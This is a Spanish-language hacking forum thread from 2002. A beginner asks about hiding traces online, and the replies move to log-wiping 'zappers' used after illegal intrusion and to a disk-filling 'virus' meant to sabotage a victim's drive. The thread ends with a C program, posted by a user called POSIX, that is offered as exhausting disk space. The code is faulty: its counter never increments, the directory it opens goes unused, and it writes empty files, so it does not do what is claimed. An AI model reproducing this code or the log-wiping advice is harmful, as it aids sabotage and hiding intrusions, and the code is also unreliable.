PDA

Ver la versión completa : Borrar huellas



el_chacal
10-09-2002, 22:57
kerria saber si con el zonealrm, se borran todas las hullas k dejamos al entrar en una pag web, o si a parte se necesita un zapper.

Gracias y un saludo.

*****el_chacal*****

Rojodos
11-09-2002, 00:32
Creo q no... aunq el zone alarm lo ponga :D ... el principal problema es q no camufla tu IP ni nada, asi que tu IP se guardara en el log de la pagina. Lo mejor (en este caso), es dar huellas falsas... usa proxys o el programa Socks Caps que te anonimiza cualquier conexion...

Un zapper sirve para otra cosa... cuando entras "ilegalmente" en un sistema (tipo UNIX), al subir el zapper y compilarlo, borra todas las huellas que hayas dejado (logs de conexion y tal..) No suele funcionar en los sistemas avanzados ya que el log esta en otro ordenador distinto al que estas accediendo. Una putada ;)

TseTse
11-09-2002, 00:49
Sigues más perdido que un pato en un garaje.
El ZoneAlarm es una aplicación que actua de Firewall (cortafuegos) a nivel de paquetes y aplicaciónes. Éste no oculta nada, ni borra logs en servidores ajenos, ni evita que envies tu IP ni nada de eso. Lo que hace es preguntarle a un paquete:
¿Quien eres?
¿De donde vienes?
¿A donde vas?
¿Qué camino vas a cojer?
¿Qué vas a hacer?
.....

Y si el ZoneAlarm ve algo sospechoso le dice:
No entras porque llevas chanclas y aquí solo se entra con zapatos.
No te dejo porque eres negro y aquí solo pasan los blancos.
No te dejo porque llevas un machete en la mano.
.....

¿Lo que te estás leyendo que fecha tiene?

TseTse

el_chacal
11-09-2002, 01:50
si, estoy + perdio k un pato en un garaje :( , pero es k he empezado hace poco, y no paro de leer guias practicar etc, etc, etc............., yo lo dije, xk en el Zonealert te pone eso, no se k prtegido, y pense eso, gracias de nuevo x acalrarme las cosas :D

Un saludo a los 2 y gracias.

*****el_chacal*****

jocanor
27-09-2002, 21:41
mira, la mayoria de los k estamos aki, no es k seamos unos sabios, pero una vez te hayas leido la superguia del hacker de nobody i las guias de carolyn meynel XDDDD:D entonces particando i sobre todo posteando, ya veras como vas aprendiendo....

una cosa:
toy trabajando en una especie de virus xorra en pascal, la idea la sake de una guia de pascal (es k no tengo ni puta idea de programacion, i voi tanteando) pos la cosa ta en crear en una carpeta, por ejemplo C:\windows\system un archivo dat log o txt lleno hasta decir basta de "aaaaaa" por ejemplo, el archivo, podria ser de 2 o 3 gigas, i eso seria una puta mu grande para segun kien, por k se le llenaria buen trozo del disco duro , i no sabria por k....,pero no se si podre acabarlo....

TseTse
27-09-2002, 22:03
Peor sería que se creasen archivos sin extensión con nombres aleatorios y tamaños diferentes por todas las carpetas del HDD. Archivos por todos los lados, ocupando memória y en algunos casos no sabes si son archivos normales o que. Una lástima que ya no tenga el source del programeja que me curré :P

TseTse

Omicron
27-09-2002, 23:15
Jocanor:
mandame el link de esos textos, tengo mucho tiempo para leer y prefiero q sea algo interesante, no crees.

POSIX
28-09-2002, 00:17
Bueno, aqui os pongo un programa parecido a lo que dice el amigo TseTse, crea archivos hasta q no quede espacio en el disco duro,
funciona en UNIX y en DOS deberia funcionar tambien.

#include <sys/types.h>
#include <dirent.h>
#include <unistd.h>
#include <stdio.h>

#define WINDIR "c:\\win98"

int main(void) {
DIR *pd;
FILE *fp;
char tmp[512];
size_t i=0;

if ((pd=opendir(WINDIR))==NULL) exit(1);

while (1) {
snprintf(tmp, 512, "tonto%d", getpid()+i);
fp=fopen(tmp, "wt");
fclose(fp);
}

return 0;
}

MESIN NET
28-09-2002, 02:07
..